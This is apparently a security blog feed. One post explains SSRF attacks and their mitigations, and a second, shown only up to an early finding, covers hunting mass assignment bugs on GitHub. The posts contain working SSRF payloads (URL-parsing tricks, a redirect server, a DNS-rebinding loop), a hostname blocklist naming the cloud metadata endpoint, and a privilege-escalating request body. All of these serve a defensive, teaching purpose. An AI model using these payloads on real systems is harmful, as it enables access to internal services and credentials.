Include Security Research Blog

Mitigating SSRF in 2023

Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to trick a server-side application into making a request to an unintended location. SSRF, unlike most other specific vulnerabilities, has gained its own spot on the OWASP Top 10 2021. This reflects both how common and how impactful this type of vulnerability has become. It is often the means by which attackers pivot a level deeper into network infrastructure, and eventually gain remote code execution.

In this article we are going to review the different ways of triggering SSRF and the main mitigation techniques for it, and discuss which of those techniques we believe are most effective, based on our experience of application security pentests.

SSRF Refresher

Like most vulnerabilities, SSRF is caused by a system naively trusting external input. With SSRF, that external input makes its way into a request, usually an HTTP request.

These two tiny Python Flask applications give a simplified example of the mechanism of SSRF:

admin.py

from flask import Flask

app = Flask(__name__)

@app.route('/admin')
def admin():
    return "Super secret admin panel"

if __name__ == "__main__":
    app.run(host="127.0.0.1", port=8888)

app.py

from flask import Flask, request
import requests

app = Flask(__name__)

@app.route('/get_image')
def get_image():
    image_url = request.args.get('image_url', '')
    if image_url:
        return requests.get(image_url).text
    else:
        return "Please provide an image URL"

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

The admin app is running on 127.0.0.1:8888, the localhost network, as it is intended to only be used by local application administrators. The main app, which is running on the same machine at port 5000 but (let’s imagine) is exposed to the Internet, has the vulnerable get_image() function. This can be used by an external attacker to forge a server-side request to the internal admin app:

$ curl http://0.0.0.0:5000/get_image?image_url=http://127.0.0.1:8888/admin
Super secret admin panel

This simple example shows the two key elements of an SSRF attack:

  1. The application allows external input to flow into a server-side request.
  2. A resource which should not be available to the attacker can be accessed or manipulated.

An SSRF can either be used to access internal resources that should not be available to an attacker, or used to access external resources in an unintended way. Examples of external resource access would include importing malicious data into an application, or spoofing the source of an attack against a third-party. SSRF against internal resources is more common and usually more impactful, so it’s what we’ll be focusing on in this post.

Failed Attempts at Mitigating SSRF

The most obvious way to mitigate SSRF would be to completely prevent external input from influencing server-side requests. Unfortunately, there are legitimate reasons why an application may need to allow external input. For instance, webhooks are user-defined HTTP callbacks that execute in order to build workflows with third-party infrastructure, and can usually be arbitrary URLs.

But before investigating the case where we need to allow arbitrary user-controlled requests, let’s just focus on the get_image() functionality for now which is trying to fetch an image from an external service.

Incomplete Allowlisting

The get_image() function of app.py is fetching a certain type of image URL so should be much more specific in what user input it accepts. Someone who is unaware of the history of SSRF attacks might think the below is enough to stop any shenanigans:

BASE_URL = "http://0.0.0.0:5000"

@app.route('/get_image')
def get_image():
  image_path = request.args.get('image_path', '')
  if image_path:
    return requests.get(f"{BASE_URL}{image_path}.png").text
  else:
    return "Please provide an image URL"

get_image() now appears to be anchoring the input to the application hostname at the beginning, and the PNG extension at the end. However both can be cut out of the request by taking advantage of features of the URL standard with the payload @127.0.0.1:8888/admin#:

$ curl 'http://0.0.0.0:5000/get_image?image_path=@127.0.0.1:8888/admin%23'
Super secret admin panel

It’s clearer to show the full request that gets sent by the backend:

>>> requests.get("http://0.0.0.0:5000@127.0.0.1:8888/admin#.png").text
'Super secret admin panel'

The BASE_URL becomes HTTP basic authentication credentials due to use of “@”, and “.png” becomes a URL fragment due to use of “#”. The credentials are ignored by the admin server and the fragment is never sent to it, so the SSRF succeeds.
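To see how that string is split, here is a minimal sketch using Python’s standard urllib.parse module. The requests library does its own parsing, so treat this as an illustration of the URL grammar rather than of requests internals. BASE_URL and the payload are the ones from the example above.

```python
from urllib.parse import urlsplit

BASE_URL = "http://0.0.0.0:5000"
payload = "@127.0.0.1:8888/admin#"  # attacker-supplied image_path

# Same string formatting as the "anchored" get_image() handler.
url = f"{BASE_URL}{payload}.png"
parts = urlsplit(url)

print(url)             # http://0.0.0.0:5000@127.0.0.1:8888/admin#.png
print(parts.username)  # 0.0.0.0   (the intended host is now just userinfo)
print(parts.password)  # 5000
print(parts.hostname)  # 127.0.0.1 (the host that is actually contacted)
print(parts.port)      # 8888
print(parts.path)      # /admin
print(parts.fragment)  # .png      (a fragment is not sent to the server)
```

Nothing the developer hard-coded ends up in the host, port, or path of the final request.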

We said that this takes advantage of features of the URL standard, but things get wild when you consider that there are multiple URL specifications and that the different request libraries out there tend to implement them slightly differently. This opens the door to bizarre methods for fooling URL parsing, discovered by researchers like Orange Tsai.

Overall, limiting the influence of external input is always a good idea, but it’s not a failsafe technique.

Incomplete Blocklisting

The other commonly seen, but even more inadequate, approach to SSRF prevention is an incomplete attempt at blocking scary hostnames.

Worst of all is a check that uses a function like urlparse() that just grabs the hostname out of a URL:

from flask import Flask, request
from urllib.parse import urlparse
import requests

app = Flask(__name__)

BLOCKED = ["127.0.0.1", "localhost", "169.254.169.254", "0.0.0.0"]

@app.route('/get_image')
def get_image():
  image_url = request.args.get('image_url', '')
  if image_url:
    if any(b in urlparse(image_url).hostname for b in BLOCKED):
      return "Hack attempt blocked"
    else:
      return requests.get(image_url).text

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

There are a large number of payloads which bypass the snippet above: 127.0.0.1 in different numeric formats (decimal, octal, hex etc.), equivalent IPv6 localhost addresses, parsing peculiarities like 127.1, alternative representations of 0.0.0.0, and generally enough variants to make you realize that hand-rolling a blocklist is a cursed idea.
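A minimal sketch of why the substring check fails, using only the standard library. The naive_is_blocked() helper is a hypothetical stand-in for the check in the snippet above, and the candidate URLs are illustrative. Whether a given spelling is actually accepted as an address depends on the HTTP client and the operating system’s resolver.

```python
import ipaddress
from urllib.parse import urlparse

BLOCKED = ["127.0.0.1", "localhost", "169.254.169.254", "0.0.0.0"]

def naive_is_blocked(url: str) -> bool:
    """Substring check against the hostname, mirroring the snippet above."""
    host = urlparse(url).hostname or ""
    return any(b in host for b in BLOCKED)

# The loopback address is just a 32-bit integer with many spellings.
print(ipaddress.IPv4Address(2130706433))  # 127.0.0.1
print(ipaddress.IPv4Address(0x7F000001))  # 127.0.0.1

candidates = [
    "http://127.0.0.1:8888/admin",     # dotted decimal: caught
    "http://2130706433:8888/admin",    # single decimal integer
    "http://0x7f000001:8888/admin",    # hexadecimal
    "http://017700000001:8888/admin",  # octal
    "http://127.1:8888/admin",         # shortened dotted form
    "http://[::1]:8888/admin",         # IPv6 loopback
]
for candidate in candidates:
    # Only the first candidate is reported as blocked.
    print(naive_is_blocked(candidate), candidate)
```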

But, without even considering whether the BLOCKED list is any good, there’s a straightforward bypass here. An attacker can just input a domain like localtest.me whose DNS lookup resolves to 127.0.0.1:

$ curl http://0.0.0.0:5000/get_image?image_url=http://127.0.0.1:8888/admin
Hack attempt blocked
$ curl http://0.0.0.0:5000/get_image?image_url=http://localtest.me:8888/admin
Super secret admin panel

This demonstrates that the provided hostname needs to be resolved, so the next stage of evolution of bad mitigations would be the following:

import socket  # needed for gethostbyname(), in addition to the earlier imports

BLOCKED = ["127.0.0.1", "localhost", "169.254.169.254", "0.0.0.0"]

@app.route('/get_image')
def get_image():
  image_url = request.args.get('image_url', '')
  if image_url:
    # Resolve the hostname first, then compare the resulting IP to the blocklist
    if any(b in socket.gethostbyname(urlparse(image_url).hostname) for b in BLOCKED):
      return "Hack attempt blocked"
    else:
      return requests.get(image_url).text

Even assuming the blocklist was perfect (this one is far from it), this code is still vulnerable to three different types of time-of-check to time-of-use (TOCTTOU) vulnerability:

  • HTTP Redirects
  • DNS Rebinding
  • Parser differential attacks

HTTP Redirects

A redirect is the most straightforward way to demonstrate the problem of TOCTTOU in the context of HTTP. The attacker hosts the following server:

attackers_redirect.py

from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def main():
    return redirect("http://127.0.0.1:8888/admin", code=302)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=1337)

By causing the vulnerable application to make an SSRF to the attacker server, the attacker server’s hostname bypasses the localhost blocklist, but a redirect is triggered back to localhost, which is not checked:

$ curl http://127.0.0.1:5000/get_image?image_url=http://0.0.0.0:1337
Super secret admin panel
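One way to close this gap is to turn off automatic redirect handling and validate every hop before requesting it. The sketch below is not taken from any particular library: fetch_once and is_allowed are hypothetical callables supplied by the caller, and the fake responses exist only so the example runs without a network.

```python
from urllib.parse import urljoin, urlparse

REDIRECT_CODES = {301, 302, 303, 307, 308}

def fetch_with_checked_redirects(url, fetch_once, is_allowed, max_hops=5):
    """Follow redirects manually, validating every hop before requesting it.

    fetch_once(url) -> (status_code, location_or_None, body) must not follow
    redirects itself. is_allowed(url) -> bool is the destination policy.
    """
    for _ in range(max_hops + 1):
        if not is_allowed(url):
            raise PermissionError(f"blocked destination: {url}")
        status, location, body = fetch_once(url)
        if status not in REDIRECT_CODES or not location:
            return body
        # Location may be relative, so resolve it against the current URL.
        url = urljoin(url, location)
    raise RuntimeError("too many redirects")

# Stand-ins for real servers (hypothetical hosts).
fake_responses = {
    "http://attacker.example:1337/": (302, "http://127.0.0.1:8888/admin", ""),
    "http://cdn.example/a": (301, "/b", ""),
    "http://cdn.example/b": (200, None, "image-bytes"),
}

def fake_fetch(url):
    return fake_responses[url]

def not_loopback(url):
    # Deliberately simplistic policy, only here to drive the example.
    return urlparse(url).hostname not in {"127.0.0.1", "localhost"}

print(fetch_with_checked_redirects("http://cdn.example/a", fake_fetch, not_loopback))
# image-bytes
try:
    fetch_with_checked_redirects("http://attacker.example:1337/", fake_fetch, not_loopback)
except PermissionError as exc:
    print(exc)  # blocked destination: http://127.0.0.1:8888/admin
```

With the requests library, fetch_once could be built on requests.get(url, allow_redirects=False), reading the status code and the Location header from the response.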

DNS Rebinding

DNS rebinding is an even more devastating technique. It exploits the TOCTTOU that exists between the DNS resolution of a domain when it’s validated, and when the request is actually made.

Services like rbndr.us make this easy; we can use it to generate a URL such as http://7f000001.0a00020f.rbndr.us, which alternates between resolving to 127.0.0.1 and 10.0.2.15, and request that in a loop:

$ while sleep 0.1; do curl http://0.0.0.0:5000/get_image?image_url=http://7f000001.0a00020f.rbndr.us:8888/admin; done
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Super secret admin panelHack attempt blockedHack attempt blocked

It took a while, but eventually the timings lined up: rbndr.us’s DNS server gave one answer to the gethostbyname() check and a different one to the requests library, allowing the SSRF to succeed. DNS rebinding is fun as it can subvert the logic of applications which assume that DNS records are fixed, rather than malleable values under attacker control.
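The race can be reproduced without any network access. In this sketch FlippingResolver is a hypothetical stand-in for the attacker’s DNS server, and its strict alternation between answers is a simplification of the real service’s behavior. The hex labels are the ones from the hostname above.

```python
import ipaddress
import itertools

def decode_label(hex_label: str) -> str:
    """Turn a hex label such as '7f000001' into a dotted IPv4 address."""
    return str(ipaddress.IPv4Address(int(hex_label, 16)))

print(decode_label("7f000001"))  # 127.0.0.1
print(decode_label("0a00020f"))  # 10.0.2.15

class FlippingResolver:
    """Simulated attacker-controlled DNS server that cycles through answers."""
    def __init__(self, *addresses):
        self._answers = itertools.cycle(addresses)

    def resolve(self, hostname: str) -> str:
        return next(self._answers)

BLOCKED = {"127.0.0.1"}

def check_then_fetch(resolver, hostname):
    """Vulnerable pattern: one lookup for the check, a second for the request."""
    checked = resolver.resolve(hostname)
    if checked in BLOCKED:
        return "Hack attempt blocked"
    connected = resolver.resolve(hostname)  # the HTTP client resolves again
    return f"connected to {connected}"

def resolve_once_then_fetch(resolver, hostname):
    """Safer pattern: connect to the same address that was checked."""
    address = resolver.resolve(hostname)
    if address in BLOCKED:
        return "Hack attempt blocked"
    return f"connected to {address}"

host = "7f000001.0a00020f.rbndr.us"
print(check_then_fetch(FlippingResolver("10.0.2.15", "127.0.0.1"), host))
# connected to 127.0.0.1
print(resolve_once_then_fetch(FlippingResolver("10.0.2.15", "127.0.0.1"), host))
# connected to 10.0.2.15
```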

Parser Differential Attacks

Finally, parser differential attacks are the end-game of the multiple URL standards and implementations mentioned a few sections above, where you’ll sometimes find applications that use one library to check a URL and another to make the request. Their different interpretations of the same string can enable an SSRF exploit to slip through.

Not Returning a Response

Sometimes you’ll find an SSRF that doesn’t return a response to the attacker, perhaps under the assumption that this is unexploitable. This is termed a “Blind SSRF”, and there are some great resources out there that show how these can often be converted to full SSRF vulnerabilities.

Application Layer Mitigation

So, having been through that journey of failed approaches, let’s talk about the decent techniques for SSRF mitigation. We’ve accepted that sometimes we need to allow users to supply arbitrary URLs for requests made from our infrastructure, so how can we stop those requests from doing anything malicious?

As we’ve seen in the previous sections, an effective SSRF mitigation approach needs at least the following capabilities:

  • Blocklist private IP addresses
  • Allowlist only permitted domains (configurable)
  • Check an arbitrary number of redirected domains
  • DNS rebinding protection

All these can be incorporated into an application library. This was the approach Include Security took back in 2016 with the release of our SafeURL libraries. They are designed to be drop-in replacements for HTTP libraries such as Python’s requests. Doyensec recently released a similar library for Golang.

The way these libraries work is by hooking into the lower-level HTTP client libraries of the respective languages (e.g. urllib3 or pycurl). TOCTTOU is prevented by validating the IP we are about to connect to just before opening a socket to the requested website with that IP. An optional configuration can be provided that enables a developer to decide which types of requests to allow, but by default it just blocks any requests to internal IP addresses. Then, a user-friendly interface can be presented similar to the higher-level HTTP libraries that are normally used.
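The core idea of validating the address immediately before connecting can be sketched with the standard library alone. This is an illustration under our own assumptions, not the SafeURL implementation: the function names are hypothetical, and a real library would do this inside the HTTP client so that the Host header and TLS server name still carry the original hostname.

```python
import ipaddress
import socket

def is_public_ip(raw: str) -> bool:
    """True only for globally routable, non-multicast addresses."""
    ip = ipaddress.ip_address(raw.split("%", 1)[0])  # drop any IPv6 scope id
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) so it is judged as IPv4.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast

def resolve_validated(host: str, port: int) -> list:
    """Resolve once and refuse the host if any answer is non-public."""
    infos = socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)
    addresses = [info[4][0] for info in infos]
    for address in addresses:
        if not is_public_ip(address):
            raise PermissionError(f"{host} resolves to blocked address {address}")
    return addresses

def open_validated_connection(host: str, port: int, timeout: float = 5.0):
    """Connect to the exact address that was validated, with no second lookup."""
    address = resolve_validated(host, port)[0]
    return socket.create_connection((address, port), timeout=timeout)

for sample in ["8.8.8.8", "127.0.0.1", "10.0.2.15", "169.254.169.254", "::1"]:
    # Only 8.8.8.8 is reported as public.
    print(sample, is_public_ip(sample))
```

Because the socket is opened against the validated IP rather than the hostname, a second DNS answer never gets the chance to differ from the one that was checked.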

Pros

The main benefit of this approach is that it’s easy to integrate into an application. An application developer can import the library and use it to make requests and the details are taken care of. One could argue that these sorts of libraries should become the default higher-level HTTP requests libraries just as modern XML libraries no longer load external entities without explicit configuration.

Cons

However, there are downsides to this approach. Developers have to remember to use the SSRF-safe library instead of the normal requests library. This can be enforced by static code analyzers on code checkin, but there are a large number of HTTP client libraries in most languages (e.g. Ruby has faraday, multipart-post, excon, rest-client, httparty, and more), making it easy for the rules to miss some. Further, there are several places that SSRF vulnerabilities can exist outside of the application. They could occur, for instance, in HTML to PDF generation services using PhantomJS or Headless Chrome, or in other types of media conversion where an external process is spawned that circumvents the mitigation. Third-party package dependencies that incidentally make HTTP requests would also not use the SSRF-safe library.

There’s also the burden of maintaining SSRF-safe libraries. While more annoying in some languages than others, the low-level functions that the libraries hook into change over time and there’s always the chance of bugs appearing due to this. As we’ve noted, it’s hard to design perfect blocklists and possible for libraries to miss some detail of address validation – this is particularly evident with IPv6 support which is complex with compatibility protocols such as DNS64, Teredo, and 6to4. Finally, internal hosts may be given globally routable addresses but be firewalled off from external hosts. Ultimately, an application layer library isn’t the best place to defend subtleties in network policy like this.

SSRF Jail

An approach we explored internally but never published is to go one level lower and mitigate SSRF at a level somewhere between the operating system and application layer. Named SSRF Jail, it’s a dynamic library that is installed into a target process and hooks into DNS and networking subsystem calls. For instance, on Linux the getaddrinfo() and connect() functions are hooked in the C standard library such that an opened socket can only connect to configured IP addresses.

The advantage of this approach is that it doesn’t require application library changes, and is more exhaustive so long as the target process doesn’t bypass the C standard library and use syscalls directly (e.g. Golang). The main disadvantage that led us to abandon this approach is that it is not granular enough: an application may need to permit requests to private IPs in specific circumstances but not in most requests, and the lower-level hooks are indiscriminate.
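As a rough analogy only (SSRF Jail hooks the C standard library, which this does not), the same idea can be imitated inside a Python process by wrapping socket.socket.connect. The connect_guard() helper is hypothetical. It only covers connect() with literal IP addresses, and it shows the granularity problem well: every socket in the process is subject to the same rule.

```python
import contextlib
import ipaddress
import socket

@contextlib.contextmanager
def connect_guard(allowed_networks):
    """Process-wide hook: sockets may only connect to the given networks."""
    allowed = [ipaddress.ip_network(net) for net in allowed_networks]
    original_connect = socket.socket.connect

    def guarded_connect(self, address):
        if self.family in (socket.AF_INET, socket.AF_INET6):
            # Only literal IPs are accepted; a hostname raises ValueError.
            ip = ipaddress.ip_address(address[0])
            if not any(ip in net for net in allowed):
                raise PermissionError(f"connect to {ip} denied by guard")
        return original_connect(self, address)

    socket.socket.connect = guarded_connect
    try:
        yield
    finally:
        socket.socket.connect = original_connect

# 203.0.113.0/24 is a documentation range, used here as a placeholder policy.
with connect_guard(["203.0.113.0/24"]):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect(("127.0.0.1", 8888))
    except PermissionError as exc:
        print(exc)  # connect to 127.0.0.1 denied by guard
    finally:
        sock.close()
```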

Network Controls

We haven’t really addressed the elephant in the room for some readers here, which is “why not just firewall the app?” With all the talk of the tricky problems of application layer blocklisting, surely the network is the right place to mitigate SSRF. Firewall rules would prevent any traffic between services and ports unless they needed it for normal functioning.

However, this is overall a blunt approach that doesn’t work with many real-world systems. We often see applications where some privileged part needs to make HTTP requests to another internal service, but the rest of the application has no need to. Further, firewalls struggle to stop SSRFs from hitting services running on the same host as the application (e.g. Redis). An ideal network architecture wouldn’t be set up this way in the first place, but for organizations that haven’t fully bought into microservices (usually for valid reasons) it’s common to see.

Therefore, requiring authentication to internal services and endpoints is important, especially (but not only) if an IP or port can’t be filtered outright. In the cloud world things are moving in this direction. A well-known target for SSRF has been the AWS EC2 instance metadata endpoint 169.254.169.254. Enabled by default, the endpoint is a rich source of internal data and credentials that can be accessed via SSRF from an EC2 instance. Blocking it outright could be difficult if the application relies on metadata. Version 2 of the instance metadata endpoint, released in 2019, adds token authentication, but at the time of writing it still has to be explicitly configured. GCP and Azure, being second movers, managed to better restrict their metadata endpoints from the get-go.
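The version 2 flow can be sketched as two requests: a PUT that obtains a session token, then a GET that presents it in a header. A typical SSRF only lets the attacker choose the URL of a GET request, so it can neither issue the PUT nor add the header. The helper names below are hypothetical, and the requests are only constructed, not sent, since the endpoint is reachable only from an EC2 instance.

```python
import urllib.request

IMDS = "http://169.254.169.254"

def build_token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """Step 1: a PUT carrying a TTL header asks for a session token."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )

def build_metadata_request(path: str, token: str) -> urllib.request.Request:
    """Step 2: each metadata GET presents the token in a header."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )

token_request = build_token_request()
print(token_request.get_method(), token_request.full_url)
# PUT http://169.254.169.254/latest/api/token

# "example-token" is a placeholder for the value returned by step 1.
metadata_request = build_metadata_request("instance-id", "example-token")
print(metadata_request.get_method(), metadata_request.full_url)
# GET http://169.254.169.254/latest/meta-data/instance-id
```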

Request Proxy

The approach to SSRF mitigation that we most like is something of a hybrid between an application- and a network-layer control. It is to proxy egress traffic in a system through a single point which applies security controls.

This concept is implemented by Stripe’s Smokescreen, which is an open source CONNECT proxy. It is deployed on your network, where it proxies HTTP traffic between the application and the destination URL and has rules about which hosts it is allowed to talk to on behalf of the app server. By default Smokescreen validates that traffic isn’t bound for an internal IP, but developers can define allowed or blocked domains in Smokescreen on a per-application basis. After Smokescreen has been fully configured, any other direct HTTP requests made from the application can be blocked in the firewall to force use of the proxy.
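From the application’s side, using such a proxy is mostly a matter of client configuration. The following sketch uses Python’s standard urllib.request. The proxy hostname and port are hypothetical placeholders, and how the proxy treats plain-HTTP versus CONNECT traffic should be checked against its own documentation.

```python
import urllib.request

# Hypothetical address of the egress proxy inside the network.
EGRESS_PROXY = "http://smokescreen.internal.example:4750"

def build_proxied_opener(proxy_url: str = EGRESS_PROXY) -> urllib.request.OpenerDirector:
    """Return an opener that sends HTTP and HTTPS requests via the proxy."""
    proxy_handler = urllib.request.ProxyHandler(
        {"http": proxy_url, "https": proxy_url}
    )
    return urllib.request.build_opener(proxy_handler)

opener = build_proxied_opener()
# opener.open("https://hooks.example.com/callback") would now be tunnelled
# through the proxy, which decides whether the destination is permitted.
```

With the requests library, the equivalent is passing a proxies dictionary with the same two keys to the request call or session.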

The real advantage of this approach is that it deals with SSRF at a level that makes sense, since as we’ve explored, SSRF is both an application- and a network-layer concern. We gain the configurability of the application-layer mitigation, with the exhaustiveness of the network-layer mitigation. We no longer have to rely on every potentially SSRF-prone HTTP request being made in an application to use the right library, and no longer have to count on every internal service having the right firewall and authentication controls applied to it.

Further, there are other advantages to centralizing the location where outbound requests are made. It enables better logging and monitoring, and means that egress comes from a small list of IPs which third parties can allowlist, which simplifies other infrastructure concerns.

The downsides are that this approach can only work if the application’s HTTP client supports HTTP CONNECT (although this is usually the case), and that Smokescreen and its policies must be built and maintained, so it needs some amount of organizational buy-in to be deployed.

Conclusion

Overall, we looked at a number of SSRF mitigations that don’t work and a number that do. Of those, for more mature organizations we most like the request proxying approach, and zero-trust security architectures that require authentication for all internal services. Failing that, e.g. for companies that don’t yet have resources to set up detailed network controls or maintain their own proxy infrastructure, an anti-SSRF application library applied on any endpoints that accept attacker-controlled input is a good initial mitigation. For defense-in-depth, multiple techniques could be combined. However, this would mean maintaining multiple identical allowlists/blocklists that have to be kept in sync, so it is not necessarily recommended.

The post Mitigating SSRF in 2023 appeared first on Include Security Research Blog.

Hunting For Mass Assignment Vulnerabilities Using GitHub CodeSearch and grep.app

This post discusses the process of searching top GitHub projects for mass assignment vulnerabilities. This led to a fun finding in the #1 most starred GitHub project, freeCodeCamp, where I was able to acquire every coding certification – supposedly representing over 6000 hours of study – in a single request.

Searching GitHub For Vulnerabilities

With more than 200 million repositories, GitHub is by far the largest code host. While the vast majority of repositories contain boilerplate code, forks, or abandoned side projects, GitHub also hosts some of the most important open source projects. To some extent Linus’s law – “given enough eyeballs, all bugs are shallow” – has been empirically shown on GitHub, as projects with more stars also had more bug fixes. We might therefore expect the top repositories to have a lower number of security vulnerabilities, especially given the incentives to find vulnerabilities such as bug bounties and CVE fame.

Undeterred by Linus’s law, I wanted to see how quickly I could find a vulnerability in a popular GitHub project. The normal approach would be to dig into the code of an individual project, and learn the specific conventions and security assumptions behind it. Combine that with a strong understanding of a particular vulnerability class, such as Java deserialization, and the use of code analysis tools to map the attack surface, and we have the ingredients to find fantastic exploits which everyone else missed, such as Alvaro Munoz’s attacks on Apache Dubbo.

However, to try and find something fast, I wanted to investigate a “wide” rather than a “deep” approach of vuln-hunting. This was motivated by the beta release of GitHub’s new CodeSearch tool. The idea was to find vulnerabilities through querying for specific antipatterns across the GitHub project corpus.

The vulnerability class I chose to focus on was mass assignment; I’ll describe why just after a quick refresher.

Mass Assignment

A mass assignment vulnerability can occur when an API takes data that a user provides, and stores it without filtering for allow-listed properties. This can enable an attacker to modify attributes that the user should not be allowed to access.

A simple example is when a User model contains a “role” property which specifies whether a user has admin permissions; consider the following User model:

  • name
  • email
  • role

And a user registration function which saves all attributes specified in the request body to a new user instance:

exports.register = (req, res) => {
  // Every property in the request body is copied onto the new user
  const user = new User(req.body);
  user.save();
};

A typical request from a frontend to this endpoint might look like:

POST /users/register

{
  "name": "test",
  "email": "[email protected]"
}

However, by modifying the request to add the “role” property, a low-privileged attacker can cause its value to be saved. The attacker’s new account will gain administrator privileges in the application:

{
  "name": "test",
  "email": "[email protected]",
  "role": "admin"
}
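The usual fix is to copy only allow-listed properties from the request body. The sketch below is written in Python, like the earlier examples in this feed, and the idea carries over directly to a JavaScript handler. The pick_allowed() helper, the field set, and the email value are hypothetical.

```python
ALLOWED_REGISTRATION_FIELDS = {"name", "email"}

def pick_allowed(body: dict, allowed: set) -> dict:
    """Keep only the properties a client is permitted to set."""
    return {key: value for key, value in body.items() if key in allowed}

# Placeholder request body containing an attacker-added "role" property.
request_body = {"name": "test", "email": "test@example.com", "role": "admin"}

print(pick_allowed(request_body, ALLOWED_REGISTRATION_FIELDS))
# {'name': 'test', 'email': 'test@example.com'}
```

The "role" property is silently dropped, so the model only ever sees fields the endpoint was designed to accept.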

The mass assignment bug class is #6 on the OWASP API Security Top 10. One of the most notorious vulnerability disclosures, back in 2012, was when researcher Egor Homakov used a mass assignment exploit against GitHub to add his own public key to the Ruby on Rails repository and commit a message directly to the master branch.

Why Mass Assignment?

This seemed like a good vulnerability class to focus on, for several reasons:

  • In the webapp assessments we do, we often find mass assignments, possibly because developers are less aware of this type of vuln compared to e.g. SQL injection.
  • They can be highly impactful, enabling privilege escalation and therefore full control over an application.
  • The huge variety of web frameworks have different ways of preventing/addressing mass assignment.
  • As in the above example, mass assignment vulns often occur on a single, simple line of code, making them easier to search for.

Mass Assignment in Node.js

Mass assignment is well known in some webdev communities, particularly Ruby on Rails. Since Rails 4, query parameters must be explicitly allow-listed before they can be used in mass assignments. Additionally, the Brakeman static analysis scanner has rules to catch any potentially dangerous attributes that have been accidentally allow-listed.

Therefore, it seemed worthwhile to narrow the scope to the current web technologies du jour, Node.js apps, frameworks, and object-relational mappers (ORMs). Among these, there’s a variety of ways that mass assignment vulnerabilities can manifest, and less documentation and awareness of them in the community.

To give examples of different ways mass assignment can show up, in the Mongoose ORM, the findOneAndUpdate() method could facilitate a mass assignment vulnerability if taking attributes directly from the user:

const filter = {_id: req.body.id};
const update = req.body;
const updatedUser = await User.findOneAndUpdate(filter, update);

In the sophisticated Loopback framework, model access is defined in ACLs, where an ACL like the following on a user model would allow a user to modify all their own attributes:

{
  "accessType": "*",
  "principalType": "ROLE",
  "principalId": "$owner",
  "permission": "ALLOW",
  "property": "*"
},

In the Adonis.js framework, any of the following methods could be used to assign multiple attributes to an object:

User.fill(), User.create(), User.createMany(), User.merge(), User.firstOrCreate(), User.fetchOrCreateMany(), User.updateOrCreate(), User.updateOrCreateMany()

The next step was to put together a shortlist of potentially-vulnerable code patterns like these, figure out how to search for them on GitHub, then filter down to those instances which actually accept user-supplied input.

Limitations of GitHub Search

GitHub’s search feature has often been criticized, and does not feel like it lives up to its potential. There are two major problems for our intended use-case:

  1. Global code searches of GitHub turn up an abundance of starter/boilerplate projects that were abandoned years ago, which aren’t relevant. There is a “stars” operator to only return popular projects, e.g. stars:>1000, but it only works when searching metadata such as repository names and descriptions, not when searching through code.
  2. The following characters are ignored in GitHub search: .,:;/\`'"=*!?#$&+^|~<>(){}[]@. As key syntactical characters in most languages, it’s a major limitation that they can’t be searched for.

The first two results when searching for “user.update(req.body)” illustrate this:

The first result looks like it might be vulnerable, but is a project with zero stars that has had no commits in years. The second result is semantically different than what we searched. Going through all 6000+ results when 99% of the results are like this is tedious.

These restrictions previously led some security researchers to use Google BigQuery to run complex queries against the 3 terabyte GitHub dataset that was released in 2016. While this can produce good results, it doesn’t appear that the dataset has been updated recently. Further, running queries on such a large amount of data quickly becomes prohibitively expensive.

GitHub CodeSearch

GitHub’s new CodeSearch tool is currently available at https://cs.github.com/ for those who have been admitted to the technology preview. The improvements include exact string search, an increased number of filters and boolean operators, and better search indexing. The CodeSearch index right now includes 7 million public repositories, chosen due to popularity and recent activity.

Trying the same query as before, the results load a lot faster and look more promising too:

The repositories showing up first actually have stars, however they all have fewer than 10. Unfortunately only 100 results are currently returned from a query, and once again, none of the repositories that showed up in my searches were particularly relevant. I looked for a way to sort by stars, but that doesn’t exist. So for our purposes, CodeSearch solves one of the problems with GitHub search, and is likely great for searching individual codebases, but is not yet suitable for making speculative searches across a large number of projects.

grep.app

Looking for a better solution, I stumbled across a third-party service called grep.app. It allows exact match and regex searches, and has only indexed 0.5 million GitHub repositories, therefore excluding a lot of the noise that has clogged up the results so far.

Trying the naïve mass assignment search once again:

Only 22 results are returned, but they are high-quality results! The first repo shown has over 800 stars. I was excited – finally, here was a search engine which could make the task efficient, especially with regex searches.

With the search space limited to top GitHub projects, I could now search for method names and get a small enough selection of results to scan through manually. This was important as “req.body” or other user input usually gets assigned to another variable before being used in a database query. To my knowledge there is no way to express these data flows in searches. CodeQL is great for tracking malicious input (taint tracking) over a small number of projects, but it can’t be used to make a “wide” query across GitHub.
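To illustrate both the appeal and the limit of pattern-based searching, here is a small sketch of the kind of regular expression one might start from. The sink list and sample lines are illustrative assumptions, not the exact queries used for this research.

```python
import re

# Method names taken from the framework examples earlier in this post.
SINKS = ("updateAttributes", "findOneAndUpdate", "fill", "merge", "create")

# A sink call whose argument list mentions req.body directly.
PATTERN = re.compile(r"\.(?:%s)\([^)]*\breq\.body\b" % "|".join(SINKS))

samples = [
    "user.updateAttributes(req.body, cb);",
    "await User.findOneAndUpdate(filter, req.body);",
    # Indirect flow: the body was destructured into `update` beforehand.
    "return user.updateAttributes(update, createStandardHandler(req, res, next));",
    "res.json(req.body);",
]

for line in samples:
    print(bool(PATTERN.search(line)), line)
# True, True, False, False
```

The third sample is missed because the user input reaches the sink through an intermediate variable, which is why searching on the method name alone and reviewing a short result list by hand was the more practical approach.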

Mass Assignment In FreeCodeCamp

Searching for “user.updateAttributes(“, the first match was for freeCodeCamp, the #1 most starred GitHub project, with over 350k stars:

Looking at the code in the first result, we appeared to have a classic mass assignment vulnerability:

function updateUserFlag(req, res, next) {
  const { user, body: update } = req;
  return user.updateAttributes(update, createStandardHandler(req, res, next));
}

